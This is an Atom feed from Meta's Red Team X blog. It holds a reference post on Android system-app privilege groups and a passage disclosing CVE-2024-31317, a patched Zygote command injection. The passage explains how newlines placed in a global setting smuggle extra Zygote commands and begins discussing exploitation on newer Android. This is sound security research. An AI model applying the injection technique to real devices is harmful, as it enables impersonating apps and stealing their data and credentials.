<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.9.5">Jekyll</generator><link href="https://rtx.meta.security/feed.xml" rel="self" type="application/atom+xml" /><link href="https://rtx.meta.security/" rel="alternate" type="text/html" /><updated>2024-07-08T21:53:36+00:00</updated><id>https://rtx.meta.security/feed.xml</id><title type="html">Meta Red Team X</title><subtitle>Technical writeups by Meta's Security folks, including Red Team.</subtitle><author><name>Meta Red Team X</name></author><entry><title type="html">The many meanings of “system app” in modern Android</title><link href="https://rtx.meta.security/reference/2024/07/03/Android-system-apps.html" rel="alternate" type="text/html" title="The many meanings of “system app” in modern Android" /><published>2024-07-03T00:00:00+00:00</published><updated>2024-07-03T00:00:00+00:00</updated><id>https://rtx.meta.security/reference/2024/07/03/Android-system-apps</id><content type="html" xml:base="https://rtx.meta.security/reference/2024/07/03/Android-system-apps.html"><![CDATA[<p>Not all Android apps are created equal. The Settings app on an Android device, for example, can change numerous things that no “normal” app can, regardless of how many permissions that app requests. Apps with special privileges like Settings are often called “system apps.” But what makes an app a “system app”? In answering that question for ourselves, we noticed that AOSP’s resources on the subject are disparate and assume a great deal of Android internals knowledge. We wrote this post to summarize what we learned for the benefit of security researchers, app developers, and enthusiasts alike.</p>

<p>In modern Android, two main things determine what an app can do—the set of <a href="https://developer.android.com/guide/topics/permissions/overview">permissions</a> it’s been granted and the SELinux domain it runs in. Permissions typically gate Binder access to system services and app components on a call-by-call basis, while SELinux gates access to Linux kernel objects (e.g. files, sockets, device nodes) and to entire Binder services. Although any app on Android can <a href="https://developer.android.com/guide/topics/permissions/defining">define a permission</a>, we’ll constrain our discussion to <em>platform permissions</em>, which are permissions built into Android that control access to system APIs.</p>

<p>Most platform permissions are defined in <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:frameworks/base/core/res/AndroidManifest.xml;l=838-7856">the manifest of the special android package</a><sup id="fnref:platform-manifests" role="doc-noteref"><a href="#fn:platform-manifests" class="footnote" rel="footnote">1</a></sup>. Note how each one includes a <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:frameworks/base/core/res/res/values/attrs_manifest.xml;l=194-317"><code class="language-plaintext highlighter-rouge">protectionLevel</code></a> string consisting of a <em>base type</em> (<code class="language-plaintext highlighter-rouge">normal</code>, <code class="language-plaintext highlighter-rouge">dangerous</code>, <code class="language-plaintext highlighter-rouge">signature</code>, or <code class="language-plaintext highlighter-rouge">internal</code>) modified by zero or more <em>flags</em> (denoted with a leading <code class="language-plaintext highlighter-rouge">|</code>, as in <code class="language-plaintext highlighter-rouge">|privileged</code>). A permission’s <code class="language-plaintext highlighter-rouge">protectionLevel</code> indirectly <a href="https://android.googlesource.com/platform/frameworks/base/+/refs/tags/android-14.0.0_r51/core/java/android/permission/Permissions.md">specifies which apps may use it</a>.</p>

<p>App SELinux domains are defined as part of Android’s <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:system/sepolicy/">OS-wide SELinux policy</a>. SELinux is used for more than just apps, so app domains (e.g. <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:system/sepolicy/private/priv_app.te"><code class="language-plaintext highlighter-rouge">priv_app</code></a>) are denoted by the <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:system/sepolicy/private/app.te"><code class="language-plaintext highlighter-rouge">appdomain</code></a> attribute. A set of textual policy rules, located in <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:system/sepolicy/private/seapp_contexts"><code class="language-plaintext highlighter-rouge">/system/etc/selinux/plat_seapp_contexts</code></a> and similar files on <a href="https://source.android.com/docs/core/architecture/partitions/shared-system-image#partitions-ssi">other Project Treble partitions</a><sup id="fnref:treble-partitions" role="doc-noteref"><a href="#fn:treble-partitions" class="footnote" rel="footnote">2</a></sup>, tell Android which domain to assign a given app.</p>

<p>Although <code class="language-plaintext highlighter-rouge">protectionLevel</code> and <code class="language-plaintext highlighter-rouge">seapp_contexts</code> fully define the privileges available to each app, both are complex and have many special cases, so it can be hard to pick out which parts matter. In our experience, most apps on a device can be classified into one or more of the following five groups, each of which grants certain privileges. Every group but the first represents some flavor of “system app”:</p>

<ul>
  <li><strong>Untrusted apps</strong> are apps that can be built by a third-party developer and installed to any Android device. Android will only grant them platform permissions with base type <code class="language-plaintext highlighter-rouge">normal</code> or <code class="language-plaintext highlighter-rouge">dangerous</code>, and they run in some flavor of <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:system/sepolicy/private/untrusted_app_all.te"><code class="language-plaintext highlighter-rouge">untrusted_app</code> SELinux domain</a>. This is the vast majority of apps on the Play Store.</li>
  <li><strong>Preinstalled apps</strong> are all the apps that come with a device. They’re located in <code class="language-plaintext highlighter-rouge">app/</code> and <code class="language-plaintext highlighter-rouge">priv-app/</code> directories under <code class="language-plaintext highlighter-rouge">/system</code>, other Project Treble partitions, and <a href="https://source.android.com/docs/core/ota/apex">APEX modules</a>. Such apps can be granted <a href="https://android.googlesource.com/platform/frameworks/base/+/refs/tags/android-14.0.0_r51/core/java/android/permission/Permissions.md#preinstalled-permissions"><code class="language-plaintext highlighter-rouge">|preinstalled</code></a> permissions and are marked <a href="https://developer.android.com/reference/android/content/pm/ApplicationInfo#FLAG_SYSTEM">FLAG_SYSTEM</a>. (Although that flag’s documentation says it “should not be used to make security decisions,” some APIs give it special treatment anyway.) Updates to preinstalled apps, which live in <code class="language-plaintext highlighter-rouge">/data/app/</code> like untrusted apps, are still considered preinstalled.</li>
  <li><strong>Privileged apps</strong> are preinstalled apps that live in <code class="language-plaintext highlighter-rouge">priv-app/</code> instead of <code class="language-plaintext highlighter-rouge">app/</code>. (Prior to Android 4.4, there was no <code class="language-plaintext highlighter-rouge">priv-app/</code> and all preinstalled apps were privileged.) They run in the <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:system/sepolicy/private/priv_app.te"><code class="language-plaintext highlighter-rouge">priv_app</code> SELinux domain</a> and can request <code class="language-plaintext highlighter-rouge">|privileged</code> permissions subject to the constraints of <a href="https://source.android.com/docs/core/permissions/perms-allowlist"><code class="language-plaintext highlighter-rouge">privapp-permissions.xml</code></a> (introduced in Android 8).</li>
  <li><strong>Platform-signed apps</strong> are apps that share a signing key (the “platform key”) with <code class="language-plaintext highlighter-rouge">/system/framework/framework-res.apk</code> and so can be granted <code class="language-plaintext highlighter-rouge">signature</code> platform permissions. They run in the <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:system/sepolicy/private/platform_app.te"><code class="language-plaintext highlighter-rouge">platform_app</code> SELinux domain</a>. Platform-signed apps don’t need to be preinstalled, but they typically are.</li>
  <li><strong>System-UID apps</strong> are platform-signed apps that run as the <code class="language-plaintext highlighter-rouge">system</code> user (UID 1000) by specifying <code class="language-plaintext highlighter-rouge">android:sharedUserId="android.uid.system"</code> in their manifest; for example, <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:packages/apps/Settings/AndroidManifest.xml;l=5">here’s where the Settings app specifies it</a>. Only platform-signed apps can do that, as the standard rules of <a href="https://developer.android.com/guide/topics/manifest/manifest-element#uid"><code class="language-plaintext highlighter-rouge">sharedUserId</code></a> require all apps in a UID to share a signing key. System-UID apps run in the <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:system/sepolicy/private/system_app.te"><code class="language-plaintext highlighter-rouge">system_app</code> SELinux domain</a> and <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:frameworks/base/core/java/android/app/ActivityManager.java;l=4768,4782-4785">bypass all permission checks</a>. Notably, <code class="language-plaintext highlighter-rouge">system</code> is just one of <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:frameworks/base/services/core/java/com/android/server/pm/PackageManagerService.java;l=2033-2050">several special users</a> that appropriately-signed apps can run as.</li>
</ul>

<p>If an app qualifies for multiple SELinux domains, Android prioritizes them in this order: <code class="language-plaintext highlighter-rouge">system_app</code>, <code class="language-plaintext highlighter-rouge">platform_app</code>, <code class="language-plaintext highlighter-rouge">priv_app</code>, <code class="language-plaintext highlighter-rouge">untrusted_app</code>. This is theoretically the order of descending privilege, but nothing enforces that. For example, we’ve seen devices whose vendor SELinux policy lets <code class="language-plaintext highlighter-rouge">priv_app</code> access resources that <code class="language-plaintext highlighter-rouge">system_app</code> cannot!</p>

<p>These groups describe the most common ways apps qualify for special privileges, but they are not comprehensive. Here are just a few examples of why two apps in the same group(s) might end up with different privileges:</p>

<ul>
  <li>The user has opted into a <code class="language-plaintext highlighter-rouge">dangerous</code> permission for one but not the other.</li>
  <li>Their signing keys differ, giving them access to different sets of app-defined <code class="language-plaintext highlighter-rouge">signature</code> permissions.</li>
  <li>One has been assigned a <a href="https://source.android.com/docs/core/permissions/android-roles">role</a> that grants it certain privileged permissions. (<code class="language-plaintext highlighter-rouge">|role</code> is one of several lesser-used <code class="language-plaintext highlighter-rouge">protectionLevel</code> flags we didn’t discuss.)</li>
  <li><code class="language-plaintext highlighter-rouge">seapp_contexts</code> contains a rule that puts one into a special SELinux domain based on its package name or UID. (Vendors often use such rules to give their own apps extra hardware access.)</li>
</ul>

<p>Nonetheless, we find these groups very useful as a mental model. For example, they helped us quantify the security impact of <a href="https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html">two</a> <a href="https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html">vulnerabilities</a> we discovered that let attackers run code in the context of various apps. We hope you’ll find them equally useful.</p>

<p><em>Thanks to Yiannis Kozyrakis, Adam Sindelar, Nik Tsytsarkin, and Vlad Ionescu for improvements and corrections.</em></p>
<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:platform-manifests" role="doc-endnote">
      <p>Platform permissions can also be defined in the manifests of other platform-signed apps, but the majority are in the <code class="language-plaintext highlighter-rouge">android</code> manifest. <a href="#fnref:platform-manifests" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:treble-partitions" role="doc-endnote">
      <p><code class="language-plaintext highlighter-rouge">/system_ext</code>, <code class="language-plaintext highlighter-rouge">/vendor</code>, <code class="language-plaintext highlighter-rouge">/product</code>, and <code class="language-plaintext highlighter-rouge">/odm</code> as of this writing <a href="#fnref:treble-partitions" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name>Tom Hebb, Red Team X</name></author><category term="reference" /><summary type="html"><![CDATA[Not all Android apps are created equal. The Settings app on an Android device, for example, can change numerous things that no “normal” app can, regardless of how many permissions that app requests. Apps with special privileges like Settings are often called “system apps.” But what makes an app a “system app”? In answering that question for ourselves, we noticed that AOSP’s resources on the subject are disparate and assume a great deal of Android internals knowledge. We wrote this post to summarize what we learned for the benefit of security researchers, app developers, and enthusiasts alike.]]></summary></entry><entry><title type="html">Becoming any Android app via Zygote command injection</title><link href="https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html" rel="alternate" type="text/html" title="Becoming any Android app via Zygote command injection" /><published>2024-06-03T00:00:00+00:00</published><updated>2024-06-03T00:00:00+00:00</updated><id>https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection</id><content type="html" xml:base="https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html"><![CDATA[<p>We have discovered a vulnerability in Android that allows an attacker with the WRITE_SECURE_SETTINGS permission, which is held by the ADB shell and certain privileged apps, to execute arbitrary code as any app on a device. By doing so, they can read and write any app’s data, make use of per-app secrets and login tokens, change most system configuration, unenroll or bypass Mobile Device Management, and more. Our exploit involves no memory corruption, meaning it works unmodified on virtually any device running Android 9 or later, and persists across reboots.</p>

<p><a href="https://android.googlesource.com/platform/frameworks/base/+/e25a0e394bbfd6143a557e1019bb7ad992d11985">A patch</a> for the issue, tracked as <a href="https://www.cve.org/CVERecord?id=CVE-2024-31317">CVE-2024-31317</a>, is included in <a href="https://source.android.com/docs/security/bulletin/2024-06-01">today’s Android Security Bulletin</a>. As is Google’s practice, device vendors were sent the bulletin a month ago, so updates for supported devices should be forthcoming or already available. Android builds with a June 2024 or later patch level are no longer vulnerable.</p>

<h2 id="background-android-app-isolation">Background: Android app isolation</h2>

<p>Despite its Linux kernel, Android’s security model differs fundamentally from that of desktop Linux. Linux is often called a multi-user operating system, but Android might be more appropriately called a multi-app operating system. On Android, what a process can do is determined not by which user started it but by which app it belongs to, and the OS <a href="https://source.android.com/docs/security/app-sandbox">guarantees</a> that one app cannot impersonate another.</p>

<p>That concept of app identity—which Android implements by giving each app its own Linux UID—underpins most Android security policy. Per-app <a href="https://developer.android.com/guide/topics/permissions/overview">permissions</a> gate sensitive API calls, <a href="https://developer.android.com/privacy-and-security/keystore">cryptographic keys</a> and <a href="https://developer.android.com/reference/android/accounts/AccountManager">account credentials</a> are visible only to the apps that created them, and <a href="https://source.android.com/docs/devices/admin">device management actions</a> are exclusive to a designated “device owner” app. If an attacker finds a way to impersonate a highly-privileged app, that’s often all they need to achieve their objective.</p>

<p>In <a href="/exploitation/2024/03/04/Android-run-as-forgery.html">my last post</a>, we impersonated apps by exploiting an injection vulnerability in a file used by run-as, a tool designed to debug apps during development. run-as was an attractive target because it’s one of the few processes on Android that’s <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:system/sepolicy/public/runas.te;l=25-26">allowed to change its UID</a><sup id="fnref:cap-setuid" role="doc-noteref"><a href="#fn:cap-setuid" class="footnote" rel="footnote">1</a></sup>. However, run-as can only be invoked from the ADB shell, quite a high bar for an attacker. In this post, we’ll lower that bar by instead exploiting <strong>Zygote</strong>, one of the few other processes that <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:system/sepolicy/private/zygote.te;l=10-11">can change its UID</a>.</p>

<h2 id="background-zygote">Background: Zygote</h2>

<p>When an app starts, Zygote is what creates its main process and sets that process’s identity. Although only System Server<sup id="fnref:system-server" role="doc-noteref"><a href="#fn:system-server" class="footnote" rel="footnote">2</a></sup> can send commands to Zygote, it does so in response to requests (e.g. Activity launches) made by ordinary apps. When System Server receives a request for an app that’s not running, it starts that app by telling Zygote to spawn a process with the appropriate package name, data directory, UID, SELinux domain, and so forth.</p>

<p>Notably, System Server controls security-critical parameters like the new app’s UID. Zygote, perhaps because of its early position in the boot sequence, doesn’t query those parameters from the Android package database itself. That means we can impersonate arbitrary apps if we can control the commands System Server sends—no Zygote exploit needed!</p>

<p>Zygote runs as a daemon and <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/com/android/internal/os/ZygoteServer.java;l=508-579">accepts commands</a> on a UNIX stream socket at <code class="language-plaintext highlighter-rouge">/dev/socket/zygote</code>. Stream sockets aren’t message-oriented, so Zygote’s wire protocol must define where one command ends and the next begins. It does so <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/android/os/ZygoteProcess.java;l=430-440">very simply</a>: each command is UTF-8 text and consists of a decimal number followed by that many <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/com/android/internal/os/ZygoteArguments.java;l=266-540">arguments</a>, each on its own line. The line after the final argument begins the next command.</p>

<p>A command consists only of a sequence of arguments. Unlike most command protocols, Zygote’s has no concept of a “command type”. Every command by default spawns a new process, and the arguments specify the details of that process. Certain <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/com/android/internal/os/ZygoteConnection.java;l=137-187">special arguments</a> override that default, causing Zygote to instead perform some other action.</p>

<p>Here’s an example of a typical process spawn command (with many arguments elided for brevity), followed by a special “set API denylist exemptions” command, which will prove relevant very soon. The text in brackets is explanatory and not part of the protocol:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>8                              [command #1 arg count]
--runtime-args                 [arg #1: vestigial, needed for process spawn]
--setuid=10266                 [arg #2: process UID]
--setgid=10266                 [arg #3: process GID]
--target-sdk-version=31        [args #4-#7: misc app parameters]
--nice-name=com.facebook.orca
--app-data-dir=/data/user/0/com.facebook.orca
--package-name=com.facebook.orca
android.app.ActivityThread     [arg #8: Java entry point]
3                              [command #2 arg count]
--set-api-denylist-exemptions  [arg #1: special argument, don't spawn process]
LClass1;-&gt;method1(             [args #2, #3: denylist entries]
LClass1;-&gt;field1:
</code></pre></div></div>

<h2 id="vulnerability-details">Vulnerability details</h2>

<p>We have found a <a href="https://developer.android.com/reference/android/provider/Settings.Global">global setting</a> in Android, “hidden_api_blacklist_exemptions”, whose value gets included directly in a Zygote command. System Server doesn’t expect the setting to contain newlines, so it neither escapes them nor denotes them in the command’s argument count. By writing a malicious value to that setting, an attacker can place lines of their choosing after the last declared argument. When Zygote sees those lines, it believes them to be a separate command, which it executes!</p>

<p>The vulnerable code path begins at <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/services/core/java/com/android/server/am/ActivityManagerService.java;l=2329-2350">a ContentObserver callback</a> in System Server, which fires when hidden_api_blacklist_exemptions is changed for any reason:</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">private</span> <span class="kt">void</span> <span class="nf">update</span><span class="o">()</span> <span class="o">{</span>
    <span class="nc">String</span> <span class="n">exemptions</span> <span class="o">=</span> <span class="nc">Settings</span><span class="o">.</span><span class="na">Global</span><span class="o">.</span><span class="na">getString</span><span class="o">(</span><span class="n">mContext</span><span class="o">.</span><span class="na">getContentResolver</span><span class="o">(),</span>
            <span class="nc">Settings</span><span class="o">.</span><span class="na">Global</span><span class="o">.</span><span class="na">HIDDEN_API_BLACKLIST_EXEMPTIONS</span><span class="o">);</span>
    <span class="k">if</span> <span class="o">(!</span><span class="nc">TextUtils</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">exemptions</span><span class="o">,</span> <span class="n">mExemptionsStr</span><span class="o">))</span> <span class="o">{</span>
        <span class="n">mExemptionsStr</span> <span class="o">=</span> <span class="n">exemptions</span><span class="o">;</span>
        <span class="k">if</span> <span class="o">(</span><span class="s">"*"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">exemptions</span><span class="o">))</span> <span class="o">{</span>
            <span class="n">mBlacklistDisabled</span> <span class="o">=</span> <span class="kc">true</span><span class="o">;</span>
            <span class="n">mExemptions</span> <span class="o">=</span> <span class="nc">Collections</span><span class="o">.</span><span class="na">emptyList</span><span class="o">();</span>
        <span class="o">}</span> <span class="k">else</span> <span class="o">{</span>
            <span class="n">mBlacklistDisabled</span> <span class="o">=</span> <span class="kc">false</span><span class="o">;</span>
            <span class="n">mExemptions</span> <span class="o">=</span> <span class="nc">TextUtils</span><span class="o">.</span><span class="na">isEmpty</span><span class="o">(</span><span class="n">exemptions</span><span class="o">)</span>
                    <span class="o">?</span> <span class="nc">Collections</span><span class="o">.</span><span class="na">emptyList</span><span class="o">()</span>
                    <span class="o">:</span> <span class="nc">Arrays</span><span class="o">.</span><span class="na">asList</span><span class="o">(</span><span class="n">exemptions</span><span class="o">.</span><span class="na">split</span><span class="o">(</span><span class="s">","</span><span class="o">));</span>
        <span class="o">}</span>
        <span class="k">if</span> <span class="o">(!</span><span class="no">ZYGOTE_PROCESS</span><span class="o">.</span><span class="na">setApiDenylistExemptions</span><span class="o">(</span><span class="n">mExemptions</span><span class="o">))</span> <span class="o">{</span>
          <span class="nc">Slog</span><span class="o">.</span><span class="na">e</span><span class="o">(</span><span class="no">TAG</span><span class="o">,</span> <span class="s">"Failed to set API blacklist exemptions!"</span><span class="o">);</span>
          <span class="c1">// leave mExemptionsStr as is, so we don't try to send the same list again.</span>
          <span class="n">mExemptions</span> <span class="o">=</span> <span class="nc">Collections</span><span class="o">.</span><span class="na">emptyList</span><span class="o">();</span>
        <span class="o">}</span>
    <span class="o">}</span>
    <span class="n">mPolicy</span> <span class="o">=</span> <span class="n">getValidEnforcementPolicy</span><span class="o">(</span><span class="nc">Settings</span><span class="o">.</span><span class="na">Global</span><span class="o">.</span><span class="na">HIDDEN_API_POLICY</span><span class="o">);</span>
<span class="o">}</span>
</code></pre></div></div>

<p>From this code, we see that the setting contains a comma-separated list of strings which gets split into an array and passed down to <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/android/os/ZygoteProcess.java;l=903-921"><code class="language-plaintext highlighter-rouge">ZYGOTE_PROCESS.setApiDenylistExemptions()</code></a>. The code incidentally prevents the attacker from using commas, but it does nothing to newlines.</p>

<p><code class="language-plaintext highlighter-rouge">ZYGOTE_PROCESS</code> is a singleton instance of <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/android/os/ZygoteProcess.java">ZygoteProcess</a>, a client for Zygote’s wire protocol. <code class="language-plaintext highlighter-rouge">setApiDenylistExemptions()</code> just calls another method, <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/android/os/ZygoteProcess.java;l=953-982"><code class="language-plaintext highlighter-rouge">maybeSetApiDenylistExemptions()</code></a>, twice: once for the primary (64-bit) Zygote, and once for the secondary (32-bit) one:</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@GuardedBy</span><span class="o">(</span><span class="s">"mLock"</span><span class="o">)</span>
<span class="kd">private</span> <span class="kt">boolean</span> <span class="nf">maybeSetApiDenylistExemptions</span><span class="o">(</span><span class="nc">ZygoteState</span> <span class="n">state</span><span class="o">,</span> <span class="kt">boolean</span> <span class="n">sendIfEmpty</span><span class="o">)</span> <span class="o">{</span>
    <span class="k">if</span> <span class="o">(</span><span class="n">state</span> <span class="o">==</span> <span class="kc">null</span> <span class="o">||</span> <span class="n">state</span><span class="o">.</span><span class="na">isClosed</span><span class="o">())</span> <span class="o">{</span>
        <span class="nc">Slog</span><span class="o">.</span><span class="na">e</span><span class="o">(</span><span class="no">LOG_TAG</span><span class="o">,</span> <span class="s">"Can't set API denylist exemptions: no zygote connection"</span><span class="o">);</span>
        <span class="k">return</span> <span class="kc">false</span><span class="o">;</span>
    <span class="o">}</span> <span class="k">else</span> <span class="k">if</span> <span class="o">(!</span><span class="n">sendIfEmpty</span> <span class="o">&amp;&amp;</span> <span class="n">mApiDenylistExemptions</span><span class="o">.</span><span class="na">isEmpty</span><span class="o">())</span> <span class="o">{</span>
        <span class="k">return</span> <span class="kc">true</span><span class="o">;</span>
    <span class="o">}</span>

    <span class="k">try</span> <span class="o">{</span>
        <span class="n">state</span><span class="o">.</span><span class="na">mZygoteOutputWriter</span><span class="o">.</span><span class="na">write</span><span class="o">(</span><span class="nc">Integer</span><span class="o">.</span><span class="na">toString</span><span class="o">(</span><span class="n">mApiDenylistExemptions</span><span class="o">.</span><span class="na">size</span><span class="o">()</span> <span class="o">+</span> <span class="mi">1</span><span class="o">));</span>
        <span class="n">state</span><span class="o">.</span><span class="na">mZygoteOutputWriter</span><span class="o">.</span><span class="na">newLine</span><span class="o">();</span>
        <span class="n">state</span><span class="o">.</span><span class="na">mZygoteOutputWriter</span><span class="o">.</span><span class="na">write</span><span class="o">(</span><span class="s">"--set-api-denylist-exemptions"</span><span class="o">);</span>
        <span class="n">state</span><span class="o">.</span><span class="na">mZygoteOutputWriter</span><span class="o">.</span><span class="na">newLine</span><span class="o">();</span>
        <span class="k">for</span> <span class="o">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="o">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">mApiDenylistExemptions</span><span class="o">.</span><span class="na">size</span><span class="o">();</span> <span class="o">++</span><span class="n">i</span><span class="o">)</span> <span class="o">{</span>
            <span class="n">state</span><span class="o">.</span><span class="na">mZygoteOutputWriter</span><span class="o">.</span><span class="na">write</span><span class="o">(</span><span class="n">mApiDenylistExemptions</span><span class="o">.</span><span class="na">get</span><span class="o">(</span><span class="n">i</span><span class="o">));</span>
            <span class="n">state</span><span class="o">.</span><span class="na">mZygoteOutputWriter</span><span class="o">.</span><span class="na">newLine</span><span class="o">();</span>
        <span class="o">}</span>
        <span class="n">state</span><span class="o">.</span><span class="na">mZygoteOutputWriter</span><span class="o">.</span><span class="na">flush</span><span class="o">();</span>
        <span class="kt">int</span> <span class="n">status</span> <span class="o">=</span> <span class="n">state</span><span class="o">.</span><span class="na">mZygoteInputStream</span><span class="o">.</span><span class="na">readInt</span><span class="o">();</span>
        <span class="k">if</span> <span class="o">(</span><span class="n">status</span> <span class="o">!=</span> <span class="mi">0</span><span class="o">)</span> <span class="o">{</span>
            <span class="nc">Slog</span><span class="o">.</span><span class="na">e</span><span class="o">(</span><span class="no">LOG_TAG</span><span class="o">,</span> <span class="s">"Failed to set API denylist exemptions; status "</span> <span class="o">+</span> <span class="n">status</span><span class="o">);</span>
        <span class="o">}</span>
        <span class="k">return</span> <span class="kc">true</span><span class="o">;</span>
    <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">IOException</span> <span class="n">ioe</span><span class="o">)</span> <span class="o">{</span>
        <span class="nc">Slog</span><span class="o">.</span><span class="na">e</span><span class="o">(</span><span class="no">LOG_TAG</span><span class="o">,</span> <span class="s">"Failed to set API denylist exemptions"</span><span class="o">,</span> <span class="n">ioe</span><span class="o">);</span>
        <span class="n">mApiDenylistExemptions</span> <span class="o">=</span> <span class="nc">Collections</span><span class="o">.</span><span class="na">emptyList</span><span class="o">();</span>
        <span class="k">return</span> <span class="kc">false</span><span class="o">;</span>
    <span class="o">}</span>
<span class="o">}</span>
</code></pre></div></div>

<p>And just like that, the command goes out on the wire. None of these three methods reject or escape newlines.</p>

<p>Interestingly, ZygoteProcess has <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/android/os/ZygoteProcess.java;l=407-454">a method</a> that issues an arbitrary command and sanitizes newlines, but it’s hardcoded to expect a “spawn process” response, making it unfit for use here. Since not all Zygote commands spawn processes, the inclusion of that assumption in what would otherwise be a generic helper function likely led directly to this bug.</p>

<h2 id="exploitation">Exploitation</h2>

<h3 id="challenge-1-nativecommandbuffer">Challenge #1: NativeCommandBuffer</h3>

<p>On Android 11 and below, exploitation is as simple as described above. In Android 12, however, Google augmented Zygote’s <a href="https://cs.android.com/android/platform/superproject/+/android-11.0.0_r48:frameworks/base/core/java/com/android/internal/os/ZygoteConnection.java;l=113-286">Java command parser</a> with a <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/jni/com_android_internal_os_ZygoteCommandBuffer.cpp;l=367-506">fast-path C++ one</a> and made both parsers read from the socket via a new class, <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/jni/com_android_internal_os_ZygoteCommandBuffer.cpp;l=52-288">NativeCommandBuffer</a>.</p>

<p>NativeCommandBuffer makes this vulnerability harder to exploit, not because of its architecture but because of a bug. <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/jni/com_android_internal_os_ZygoteCommandBuffer.cpp;l=59-97"><code class="language-plaintext highlighter-rouge">readLine()</code></a>, which reads bytes from the wire, fills a local buffer with bytes from the socket and then extracts lines from that buffer, refilling it as necessary. But after parsing all of a command’s lines, Zygote <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/jni/com_android_internal_os_ZygoteCommandBuffer.cpp;l=454-455">discards</a><sup id="fnref:java-parser" role="doc-noteref"><a href="#fn:java-parser" class="footnote" rel="footnote">3</a></sup> any remaining bytes in the buffer and reads the next command from the socket. This behavior causes three problems:</p>

<ol>
  <li>If a client writes two commands in a row before Zygote gets around to reading, Zygote will ignore the second one.</li>
  <li>If a client writes a command and a half (e.g. because the second command takes multiple <code class="language-plaintext highlighter-rouge">write()</code> calls) before Zygote reads, Zygote will ignore the start of the second command as above. Furthermore, it will parse the end of the second command as if it were the beginning, which is itself a security flaw. Note, however, that System Server (Zygote’s only client) never writes multiple commands at a time, so this scenario (and the previous one) does not happen in practice.</li>
  <li>If we as attackers use the exact exploit described above, we’ll hit case #1 and our injected lines won’t do anything.</li>
</ol>

<p>Despite this roadblock, we can still exploit the bug on Android 12+! All we need is a way to keep our malicious command out of Zygote’s first <code class="language-plaintext highlighter-rouge">read()</code> call. We initially tried lengthening our exploit to exceed the buffer length Zygote passes to <code class="language-plaintext highlighter-rouge">read()</code>, but unfortunately Zygote <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/jni/com_android_internal_os_ZygoteCommandBuffer.cpp;l=79-82">aborts</a> if a read ever fills its (<a href="https://cs.android.com/android/platform/superproject/+/android-12.0.0_r34:frameworks/base/core/jni/com_android_internal_os_ZygoteCommandBuffer.cpp;l=48">12200-byte</a>, expanded to <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/jni/com_android_internal_os_ZygoteCommandBuffer.cpp;l=49">32768-byte</a> in Android 13) buffer completely. So instead we turned to timing: we can assume that Zygote spends most of its time blocked in <code class="language-plaintext highlighter-rouge">read()</code>, which means any write we make is likely to trigger an immediate short read, even if we make another write shortly after.</p>

<p>As we saw, <code class="language-plaintext highlighter-rouge">maybeSetApiDenylistExemptions()</code> makes multiple calls to <code class="language-plaintext highlighter-rouge">state.mZygoteOutputWriter.write()</code>. But do those calls map directly to socket writes? It turns out they don’t, as <code class="language-plaintext highlighter-rouge">mZygoteOutputWriter</code> is a <a href="https://developer.android.com/reference/java/io/BufferedWriter">BufferedWriter</a>, which <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:libcore/ojluni/src/main/java/java/io/BufferedWriter.java;l=125-137">aggregates</a> writes in an internal buffer before writing to the underlying transport.</p>

